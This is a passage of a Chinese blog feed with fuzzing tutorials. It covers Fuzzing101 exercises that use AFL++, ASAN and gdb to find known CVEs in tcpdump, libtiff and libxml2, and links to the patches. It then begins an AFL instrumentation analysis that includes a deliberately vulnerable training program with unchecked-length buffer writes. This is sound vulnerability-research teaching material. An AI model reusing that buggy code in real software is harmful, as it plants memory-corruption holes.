src="/image-20220720151209643.png"></p><ul><li>报错信息<code>Program received signal SIGSEGV, Segmentation fault.</code>,存在内存泄漏</li><li>报错位置<code>exif_get_sshort (buf=0x555655563195 <error: Cannot access memory at address 0x555655563195>, order=EXIF_BYTE_ORDER_MOTOROLA) at exif-utils.c:92</code>,注意这里的报错,内存地址无法访问,再看地址,估计为堆缓冲区溢出</li></ul><h3 id="crash2"><a href="#crash2" class="headerlink" title="crash2"></a>crash2</h3><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">gdb</span> --args ./install/bin/exif ./out/default/crashes/id\:<span class="hljs-number">000002</span>\,sig\:<span class="hljs-number">11</span>\,src\:<span class="hljs-number">000301</span>\,time\:<span class="hljs-number">126417</span>\,execs\:<span class="hljs-number">126621</span>\,op\:havoc\,rep\:<span class="hljs-number">8</span><br></code></pre></td></tr></table></figure><p><img src="/image-20220720151942175.png"></p><ul><li>报错信息<code>Program received signal SIGSEGV, Segmentation fault.</code>,存在内存泄露</li><li>报错位置<code>__memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:345</code></li></ul><h3 id="crash3"><a href="#crash3" class="headerlink" title="crash3"></a>crash3</h3><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">gdb</span> --args ./install/bin/exif ./out/default/crashes/id\:<span class="hljs-number">000006</span>\,sig\:<span class="hljs-number">11</span>\,src\:<span class="hljs-number">000492</span>+<span class="hljs-number">000181</span>\,time\:<span class="hljs-number">341313</span>\,execs\:<span class="hljs-number">358541</span>\,op\:splice\,rep\:<span class="hljs-number">8</span><br></code></pre></td></tr></table></figure><p><img src="/image-20220720152601376.png"></p><ul><li>报错信息<code>Program received signal SIGSEGV, Segmentation fault</code>,存在内存泄露</li><li>报错位置<code>exif_get_slong (b=0x555555582000 <error: Cannot access memory at address 0x555555582000>, order=EXIF_BYTE_ORDER_MOTOROLA) at exif-utils.c:135</code>,与1类似</li></ul><h2 id="漏洞修复-1"><a href="#漏洞修复-1" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><ul><li><a href="https://github.com/libexif/libexif/commit/8ce72b7f81e61ef69b7ad5bdfeff1516c90fa361">https://github.com/libexif/libexif/commit/8ce72b7f81e61ef69b7ad5bdfeff1516c90fa361</a></li><li><a href="https://github.com/libexif/libexif/commit/00986f6fa979fe810b46e376a462c581f9746e06">https://github.com/libexif/libexif/commit/00986f6fa979fe810b46e376a462c581f9746e06</a></li></ul><h1 id="Exercise-3-tcpdump-使用ASAN"><a href="#Exercise-3-tcpdump-使用ASAN" class="headerlink" title="Exercise 3 - tcpdump(使用ASAN)"></a>Exercise 3 - tcpdump(使用ASAN)</h1><p><a href="https://www.cvedetails.com/cve/CVE-2017-13028/"><strong>CVE-2017-13028</strong></a> in TCPdump 4.9.2(Out-of-bounds Read)</p><p>libcap是tcpdump的依赖库,可以不install,但需要保证目录位置与tcpdump根目录相同,且名称可识别</p><h2 id="使用ASAN编译"><a href="#使用ASAN编译" class="headerlink" title="使用ASAN编译"></a>使用ASAN编译</h2><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs routeros">cd <span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_tcpdump/libpcap-1.8.0/<br><span class="hljs-built_in">export</span> <span class="hljs-attribute">LLVM_CONFIG</span>=<span class="hljs-string">"llvm-config-12"</span><br><span class="hljs-attribute">CC</span>=/root/fuzz/AFLplusplus/afl-clang-lto ./configure <span class="hljs-attribute">--enable-shared</span>=<span class="hljs-literal">no</span> <span class="hljs-attribute">--prefix</span>=<span class="hljs-string">"<span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_tcpdump/install/"</span><br><span class="hljs-attribute">AFL_USE_ASAN</span>=1 make<br><span class="hljs-attribute">AFL_USE_ASAN</span>=1 make install<br><br>cd <span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_tcpdump/tcpdump-tcpdump-4.9.2/<br><span class="hljs-attribute">AFL_USE_ASAN</span>=1 <span class="hljs-attribute">CC</span>=/root/fuzz/AFLplusplus/afl-clang-lto ./configure <span class="hljs-attribute">--prefix</span>=<span class="hljs-string">"<span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_tcpdump/install/"</span><br><span class="hljs-attribute">AFL_USE_ASAN</span>=1 make<br><span class="hljs-attribute">AFL_USE_ASAN</span>=1 make install<br></code></pre></td></tr></table></figure><p>这里配置tcpdump的configure时也要加AFL_USE_ASAN=1,因为它的依赖库也加了ASAN</p><h2 id="fuzz-2"><a href="#fuzz-2" class="headerlink" title="fuzz"></a>fuzz</h2><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">afl-fuzz -m none -i .<span class="hljs-regexp">/tcpdump-tcpdump-4.9.2/</span>tests<span class="hljs-regexp">/ -o ./</span>afl_out<span class="hljs-regexp">/ -s 123 -- ./i</span>nstall<span class="hljs-regexp">/sbin/</span>tcpdump -vvvvXX -ee -nn -r @@<br></code></pre></td></tr></table></figure><p>ASAN会消耗大量内存,使用<code>-m none</code>不限制内存使用</p><p>这个我跑了比较久(挂着进程容易忘关)</p><p><img src="/image-20220722203927704.png"></p><h2 id="动态调试-2"><a href="#动态调试-2" class="headerlink" title="动态调试"></a>动态调试</h2><p>有ASAN就不用再重新编译整个文件来调试了(这里如果用普通编译来运行crash反而得不到报错信息,显然这里的内存泄露不会直接导致crash)</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">.<span class="hljs-regexp">/install/</span>sbin<span class="hljs-regexp">/tcpdump -vvvvXX -ee -nn -r ./</span>afl_out<span class="hljs-regexp">/default/</span>crashes/id\:<span class="hljs-number">000000</span>\,sig\:<span class="hljs-number">06</span>\,src\:<span class="hljs-number">011483</span>\,time\:<span class="hljs-number">43941578</span>\,execs\:<span class="hljs-number">17770128</span>\,op\:havoc\,rep\:<span class="hljs-number">8</span><br></code></pre></td></tr></table></figure><p>直接运行crash,ASAN会给出较为详细的报错和调用栈</p><p><img src="/image-20220725164803244.png"></p><ul><li>报错信息:<code>AddressSanitizer: heap-buffer-overflow /root/fuzz_target/fuzzing_tcpdump/tcpdump-tcpdump-4.9.2/./extract.h:184:20 in EXTRACT_16BITS</code>,直接说明是堆溢出</li></ul><h2 id="漏洞修复-2"><a href="#漏洞修复-2" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><ul><li><a href="https://github.com/the-tcpdump-group/tcpdump/commit/85078eeaf4bf8fcdc14a4e79b516f92b6ab520fc#diff-05f854a9033643de07f0d0059bc5b98f3b314eeb1e2499ea1057e925e6501ae8L381">https://github.com/the-tcpdump-group/tcpdump/commit/85078eeaf4bf8fcdc14a4e79b516f92b6ab520fc#diff-05f854a9033643de07f0d0059bc5b98f3b314eeb1e2499ea1057e925e6501ae8L381</a></li></ul><h1 id="Exercise-4-libtiff(coverage优化)"><a href="#Exercise-4-libtiff(coverage优化)" class="headerlink" title="Exercise 4 - libtiff(coverage优化)"></a>Exercise 4 - libtiff(coverage优化)</h1><p><a href="https://www.cvedetails.com/cve/CVE-2016-9297/"><strong>CVE-2016-9297</strong></a> in libtiff 4.0.4 (Out-of-bounds Read)</p><h2 id="使用lvoc(覆盖率检测)编译libtiff"><a href="#使用lvoc(覆盖率检测)编译libtiff" class="headerlink" title="使用lvoc(覆盖率检测)编译libtiff"></a>使用lvoc(覆盖率检测)编译libtiff</h2><figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs abnf"><span class="hljs-attribute">CFLAGS</span><span class="hljs-operator">=</span><span class="hljs-string">"--coverage"</span> LDFLAGS<span class="hljs-operator">=</span><span class="hljs-string">"--coverage"</span> ./configure --prefix<span class="hljs-operator">=</span><span class="hljs-string">"$HOME/fuzz_target/fuzzing_tiff/install/"</span> --disable-shared<br>make<br>make install<br></code></pre></td></tr></table></figure><h2 id="获取覆盖率"><a href="#获取覆盖率" class="headerlink" title="获取覆盖率"></a>获取覆盖率</h2><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs stylus">cd <span class="hljs-variable">$HOME</span>/fuzzing_tiff/tiff-<span class="hljs-number">4.0</span>.<span class="hljs-number">4</span>/<br>lcov <span class="hljs-attr">--zerocounters</span> <span class="hljs-attr">--directory</span> ./<br>lcov <span class="hljs-attr">--capture</span> <span class="hljs-attr">--initial</span> <span class="hljs-attr">--directory</span> ./ <span class="hljs-attr">--output-file</span> app<span class="hljs-selector-class">.info</span><br><span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_tiff/install/bin/tiffinfo -D -j -c -r -s -w <span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_tiff/tiff-<span class="hljs-number">4.0</span>.<span class="hljs-number">4</span>/test/images/palette-<span class="hljs-number">1</span>c-<span class="hljs-number">1</span>b<span class="hljs-selector-class">.tiff</span><br>lcov <span class="hljs-attr">--no-checksum</span> <span class="hljs-attr">--directory</span> ./ <span class="hljs-attr">--capture</span> <span class="hljs-attr">--output-file</span> app2.info<br></code></pre></td></tr></table></figure><ul><li><p><code>lcov --zerocounters --directory ./</code>:重置计数器</p></li><li><p><code>lcov --capture --initial --directory ./ --output-file app.info</code>:为每个instrumented line返回覆盖率数据的初始化基准</p></li><li><p><code>$HOME/fuzzing_tiff/install/bin/tiffinfo -D -j -c -r -s -w $HOME/fuzzing_tiff/tiff-4.0.4/test/images/palette-1c-1b.tiff0</code>:运行需要分析的应用,可以用多个样本运行多次</p></li><li><p><code>lcov --no-checksum --directory ./ --capture --output-file app2.info</code>:保存覆盖率状态</p></li></ul><p>将结果转化生成HTML输出</p><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli">genhtml <span class="hljs-params">--highlight</span> <span class="hljs-params">--legend</span> -output-directory <span class="hljs-string">./html-coverage/</span> <span class="hljs-string">./app2.info</span><br></code></pre></td></tr></table></figure><h2 id="编译文件"><a href="#编译文件" class="headerlink" title="编译文件"></a>编译文件</h2><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-built_in">export</span> <span class="hljs-attribute">LLVM_CONFIG</span>=<span class="hljs-string">"llvm-config-12"</span><br><span class="hljs-attribute">CC</span>=/root/fuzz/AFLplusplus/afl-clang-lto ./configure <span class="hljs-attribute">--prefix</span>=<span class="hljs-string">"<span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_tiff/install/"</span> --disable-shared<br><span class="hljs-attribute">AFL_USE_ASAN</span>=1 make -j4<br><span class="hljs-attribute">AFL_USE_ASAN</span>=1 make install<br>afl-fuzz -m none -i <span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_tiff/tiff-4.0.4/test/images/ -o <span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_tiff/out/ -s 123 -- <span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_tiff/install/bin/tiffinfo -D -j -c -r -s -w @@<br></code></pre></td></tr></table></figure><p>这里使用尽可能多的参数,增大fuzz到漏洞代码的概率</p><h2 id="fuzz-3"><a href="#fuzz-3" class="headerlink" title="fuzz"></a>fuzz</h2><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">afl-fuzz -m none -i <span class="hljs-variable">$HOME</span><span class="hljs-regexp">/fuzz_target/</span>fuzzing_tiff<span class="hljs-regexp">/tiff-4.0.4/</span>test<span class="hljs-regexp">/images/</span> -o <span class="hljs-variable">$HOME</span><span class="hljs-regexp">/fuzz_target/</span>fuzzing_tiff<span class="hljs-regexp">/afl_out/</span> -s <span class="hljs-number">123</span> -- <span class="hljs-variable">$HOME</span><span class="hljs-regexp">/fuzz_target/</span>fuzzing_tiff<span class="hljs-regexp">/install/</span>bin/tiffinfo -D -j -c -r -s -w @@<br></code></pre></td></tr></table></figure><p><img src="/image-20220725165647833.png"></p><h2 id="动态调试-3"><a href="#动态调试-3" class="headerlink" title="动态调试"></a>动态调试</h2><p>查看报错</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">.<span class="hljs-regexp">/install/</span>bin<span class="hljs-regexp">/tiffinfo -D -j -c -r -s -w ./</span>out<span class="hljs-regexp">/default/</span>crashes/id\:<span class="hljs-number">000000</span>\,sig\:<span class="hljs-number">06</span>\,src\:<span class="hljs-number">000016</span>\,time\:<span class="hljs-number">556815</span>\,execs\:<span class="hljs-number">377779</span>\,op\:havoc\,rep\:<span class="hljs-number">4</span> <br></code></pre></td></tr></table></figure><p><img src="/image-20220725165924945.png"></p><ul><li>报错信息:<code>AddressSanitizer: heap-buffer-overflow (/root/fuzz_target/fuzzing_tiff/install/bin/tiffinfo+0x2aaf11) in fputs</code>,堆溢出</li></ul><h2 id="漏洞修复-3"><a href="#漏洞修复-3" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><ul><li><a href="https://github.com/vadz/libtiff/commit/30c9234c7fd0dd5e8b1e83ad44370c875a0270ed">https://github.com/vadz/libtiff/commit/30c9234c7fd0dd5e8b1e83ad44370c875a0270ed</a></li></ul><h1 id="Exercise-5-libxml2(自定义字典、并行)"><a href="#Exercise-5-libxml2(自定义字典、并行)" class="headerlink" title="Exercise 5 - libxml2(自定义字典、并行)"></a>Exercise 5 - libxml2(自定义字典、并行)</h1><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-9048"><strong>CVE-2017-9048</strong></a> in LibXML2 2.9.4(stack buffer overflow)</p><h2 id="字典用途"><a href="#字典用途" class="headerlink" title="字典用途"></a>字典用途</h2><p>本质上就是有一定意义的字符串token</p><ul><li>Override:直接覆盖样本中的n个字节</li><li>Insert:在样本中插入n个字节</li></ul><p>AFL++提供了现成的<a href="https://github.com/AFLplusplus/AFLplusplus/tree/stable/dictionaries">字典</a>(可以凑合)</p><p>也可以自己手动构建,用codeql(在线平台<a href="https://lgtm.com/#explore">LGTM</a>)可以快速查询我们需要的特征字符串如</p><ul><li>判断的条件</li><li>strcmp、memcmp中的参数</li><li>声明的常量等</li></ul><h2 id="并行"><a href="#并行" class="headerlink" title="并行"></a>并行</h2><p>将fuzzer分为master和slave,实现共享instance</p><figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs crmsh">./afl-fuzz -i afl_in -o afl_out -M <span class="hljs-keyword">Master</span> <span class="hljs-title">-- ./program</span> @@<br></code></pre></td></tr></table></figure><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli"><span class="hljs-string">./afl-fuzz</span> -i afl_in -o afl_out -S Slave1 -- <span class="hljs-string">./program</span> @@<br><span class="hljs-string">./afl-fuzz</span> -i afl_in -o afl_out -S Slave2 -- <span class="hljs-string">./program</span> @@<br><span class="hljs-string">...</span><br><span class="hljs-string">./afl-fuzz</span> -i afl_in -o afl_out -S SlaveN -- <span class="hljs-string">./program</span> @@<br></code></pre></td></tr></table></figure><h2 id="编译文件-1"><a href="#编译文件-1" class="headerlink" title="编译文件"></a>编译文件</h2><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs routeros">sudo apt-<span class="hljs-built_in">get</span> install python-dev<br><span class="hljs-attribute">CC</span>=/root/fuzz/AFLplusplus/afl-clang-lto <span class="hljs-attribute">CXX</span>=/root/fuzz/AFLplusplus/afl-clang-lto++ <span class="hljs-attribute">CFLAGS</span>=<span class="hljs-string">"-fsanitize=address"</span> <span class="hljs-attribute">CXXFLAGS</span>=<span class="hljs-string">"-fsanitize=address"</span> <span class="hljs-attribute">LDFLAGS</span>=<span class="hljs-string">"-fsanitize=address"</span> ./configure <span class="hljs-attribute">--prefix</span>=<span class="hljs-string">"<span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_libxml2/libxml2/install"</span> --disable-shared --without-<span class="hljs-built_in">debug</span> --without-ftp --without-http --without-legacy --without-python <span class="hljs-attribute">LIBS</span>=<span class="hljs-string">'-ldl'</span><br><span class="hljs-attribute">AFL_USE_ASAN</span>=1 <span class="hljs-attribute">AFL_MAP_SIZE</span>=262144 make -j$(nproc)<br><span class="hljs-attribute">AFL_USE_ASAN</span>=1 <span class="hljs-attribute">AFL_MAP_SIZE</span>=262144 make install<br></code></pre></td></tr></table></figure><p>这里在编译时没有直接用ASAN,而是用了编译器自带的<code>fsanitize</code>,功能如下</p><ul><li><code>-fsanitize=leak</code>:检测内存泄漏</li><li><code>-fsanitize=address</code>:检测内存越界,这等于ASAN</li></ul><p>编译时设置AFL_MAP_SIZE=262144,决定共享空间大小,因为程序较大,不改成一个较大值会给弹一个警告,最好设置一下。</p><h2 id="获取样本和字典"><a href="#获取样本和字典" class="headerlink" title="获取样本和字典"></a>获取样本和字典</h2><p>这里用的是fuzzing101提供的样本以及test中的dtd9(DTD,它们会定义 XML 文档的结构和合法元素/属性,并用于确定 xml 文档是否有效)。</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">mkdir afl_in && cd afl_in<br>wget https:<span class="hljs-regexp">//</span>raw.githubusercontent.com<span class="hljs-regexp">/antonio-morales/</span>Fuzzing101<span class="hljs-regexp">/main/</span>Exercise%<span class="hljs-number">205</span>/SampleInput.xml<br>cd ..<br></code></pre></td></tr></table></figure><p>使用AFL++提供的字典</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">mkdir dictionaries && cd dictionaries<br>wget https:<span class="hljs-regexp">//</span>raw.githubusercontent.com<span class="hljs-regexp">/AFLplusplus/</span>AFLplusplus<span class="hljs-regexp">/stable/</span>dictionaries/xml.dict<br>cd ..<br></code></pre></td></tr></table></figure><h2 id="fuzz-4"><a href="#fuzz-4" class="headerlink" title="fuzz"></a>fuzz</h2><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli">afl-fuzz -m none -i <span class="hljs-string">./afl_in</span> -o afl_out -s 123 -x <span class="hljs-string">./dictionaries/xml.dict</span> -D -M master -- <span class="hljs-string">./xmllint</span> <span class="hljs-params">--memory</span> <span class="hljs-params">--noenc</span> <span class="hljs-params">--nocdata</span> <span class="hljs-params">--dtdattr</span> <span class="hljs-params">--loaddtd</span> <span class="hljs-params">--valid</span> <span class="hljs-params">--xinclude</span> @@<br>afl-fuzz -m none -i <span class="hljs-string">./afl_in</span> -o afl_out -s 234 -S slave1 -- <span class="hljs-string">./xmllint</span> <span class="hljs-params">--memory</span> <span class="hljs-params">--noenc</span> <span class="hljs-params">--nocdata</span> <span class="hljs-params">--dtdattr</span> <span class="hljs-params">--loaddtd</span> <span class="hljs-params">--valid</span> <span class="hljs-params">--xinclude</span> @@<br></code></pre></td></tr></table></figure><ul><li>-D:打开persistent mutations</li></ul><p>然后要跑很久,居然是靠havoc出的让我很意外</p><p><img src="/%60%5BQA7RIPKA%25%60%60LOH%6017%7BN2R.png"></p><h2 id="动态调试-4"><a href="#动态调试-4" class="headerlink" title="动态调试"></a>动态调试</h2><p>先手动编译出不插桩的程序,丢进gdb里调试</p><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli">gdb <span class="hljs-params">--args</span> <span class="hljs-string">./xmllint</span> <span class="hljs-params">--memory</span> <span class="hljs-params">--noenc</span> <span class="hljs-params">--nocdata</span> <span class="hljs-params">--dtdattr</span> <span class="hljs-params">--loaddtd</span> <span class="hljs-params">--valid</span> <span class="hljs-params">--xinclude</span> <span class="hljs-string">./afl_out/slave1/crashes/id</span><span class="hljs-function">:000009</span>,sig<span class="hljs-function">:06</span>,src<span class="hljs-function">:009269</span>,time<span class="hljs-function">:119653664</span>,execs<span class="hljs-function">:60774850</span>,op<span class="hljs-function">:havoc</span>,rep<span class="hljs-function">:4</span><br></code></pre></td></tr></table></figure><p><img src="/image-20220719232340167.png"></p><ul><li><p>报错信息<code>*** stack smashing detected ***: terminated</code>,判断为栈溢出漏洞</p></li><li><p>漏洞位置<code>__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50</code>,找到问题代码</p></li></ul><h2 id="漏洞修复-4"><a href="#漏洞修复-4" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><ul><li><a href="https://github.com/GNOME/libxml2/commit/932cc9896ab41475d4aa429c27d9afd175959d74">https://github.com/GNOME/libxml2/commit/932cc9896ab41475d4aa429c27d9afd175959d74</a></li></ul>]]></content>
<tags>
<tag>Fuzz</tag>
</tags>
</entry>
<entry>
<title>AFL源码fuzzing流程分析</title>
<link href="/2022/05/04/AFL%E6%BA%90%E7%A0%81fuzzing%E6%B5%81%E7%A8%8B%E5%88%86%E6%9E%90/"/>
<url>/2022/05/04/AFL%E6%BA%90%E7%A0%81fuzzing%E6%B5%81%E7%A8%8B%E5%88%86%E6%9E%90/</url>
<content type="html"><![CDATA[<h1 id="source-code-fuzzing的基本流程"><a href="#source-code-fuzzing的基本流程" class="headerlink" title="source code fuzzing的基本流程"></a>source code fuzzing的基本流程</h1><p><img src="/image-20220429194405206.png" alt="整体流程"></p><p>主要内容是Instrument target和Fuzz本体</p><h1 id="Instrument"><a href="#Instrument" class="headerlink" title="Instrument"></a>Instrument</h1><p>根据compiler的选择不同会影响后续fuzzing效率</p><ul><li><p>LTO mode (afl-clang-lto/afl-clang-lto++)</p><p>LTO(Link Time Optimization)链接时优化是链接期间的程序优化,多个中间文件通过链接器合并在一起,并将它们组合为一个程序,缩减代码体积,因此链接时优化是对整个程序的分析和跨模块的优化。</p><p>需要llvm 11+,这是当前afl支持的效率最高的选择(理论上,实际情况会受未知因素影响,比如fuzzing libxml2的时候),也意味着编译要花更长时间</p></li><li><p>LLVM mode (afl-clang-fast/afl-clang-fast++)</p><p>依赖LLVM的optimizer,稳定性较高的编译器,用的比较多,可以跨平台(non-x86)编译</p><p>实现了编译级插桩,效果比汇编级插桩更好</p></li><li><p>GCC_PLUGIN mode (afl-gcc-fast/afl-g++-fast)</p><p>效果和LLVM mode差不多,不过依赖的是GCC_plugin,也比较推荐</p></li><li><p>GCC mode (afl-gcc/afl-g++) (or afl-clang/afl-clang++ for clang)</p><p>相较其他编译器,没别的特色,基本用不到</p></li></ul><p>从编译的实现流程上理解插桩模式差异</p><p><img src="/image-20220430011819706.png" alt="编译层级"></p><h2 id="afl-gcc插桩分析"><a href="#afl-gcc插桩分析" class="headerlink" title="afl-gcc插桩分析"></a>afl-gcc插桩分析</h2><p>考虑到afl的插桩方式随编译器的选择而变化,从最简单的afl-gcc开始入手。</p><p>先把一个简单程序用<code>afl-gcc</code>编译,<a href="https://github.com/mykter/afl-training">代码来源</a></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><string.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><unistd.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span><br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> INPUTSIZE 100</span><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">process</span><span class="hljs-params">(<span class="hljs-type">char</span> *input)</span></span><br><span class="hljs-function"></span>{<br><span class="hljs-type">char</span> *out;<br><span class="hljs-type">char</span> *rest;<br><span class="hljs-type">int</span> len;<br><span class="hljs-keyword">if</span> (<span class="hljs-built_in">strncmp</span>(input, <span class="hljs-string">"u "</span>, <span class="hljs-number">2</span>) == <span class="hljs-number">0</span>)<br>{ <span class="hljs-comment">// upper case command</span><br><span class="hljs-type">char</span> *rest;<br>len = <span class="hljs-built_in">strtol</span>(input + <span class="hljs-number">2</span>, &rest, <span class="hljs-number">10</span>); <span class="hljs-comment">// how many characters of the string to upper-case</span><br>rest += <span class="hljs-number">1</span>;<span class="hljs-comment">// skip the first char (should be a space)</span><br>out = <span class="hljs-built_in">malloc</span>(len + <span class="hljs-built_in">strlen</span>(input));<span class="hljs-comment">// could be shorter, but play it safe</span><br><span class="hljs-keyword">if</span> (len > (<span class="hljs-type">int</span>)<span class="hljs-built_in">strlen</span>(input))<br>{<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"Specified length %d was larger than the input!\n"</span>, len);<br><span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>}<br><span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (out == <span class="hljs-literal">NULL</span>)<br>{<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"Failed to allocate memory\n"</span>);<br><span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>}<br><span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i != len; i++)<br>{<br><span class="hljs-type">char</span> c = rest[i];<br><span class="hljs-keyword">if</span> (c > <span class="hljs-number">96</span> && c < <span class="hljs-number">123</span>) <span class="hljs-comment">// ascii a-z</span><br>{<br>c -= <span class="hljs-number">32</span>;<br>}<br>out[i] = c;<br>}<br>out[len] = <span class="hljs-number">0</span>;<br><span class="hljs-built_in">strcat</span>(out, rest + len); <span class="hljs-comment">// append the remaining text</span><br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s"</span>, out);<br><span class="hljs-built_in">free</span>(out);<br>}<br><span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strncmp</span>(input, <span class="hljs-string">"head "</span>, <span class="hljs-number">5</span>) == <span class="hljs-number">0</span>)<br>{ <span class="hljs-comment">// head command</span><br><span class="hljs-keyword">if</span> (<span class="hljs-built_in">strlen</span>(input) > <span class="hljs-number">6</span>)<br>{<br>len = <span class="hljs-built_in">strtol</span>(input + <span class="hljs-number">4</span>, &rest, <span class="hljs-number">10</span>);<br>rest += <span class="hljs-number">1</span>; <span class="hljs-comment">// skip the first char (should be a space)</span><br>rest[len] = <span class="hljs-string">'\0'</span>; <span class="hljs-comment">// truncate string at specified offset</span><br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s\n"</span>, rest);<br>}<br><span class="hljs-keyword">else</span><br>{<br><span class="hljs-built_in">fprintf</span>(stderr, <span class="hljs-string">"head input was too 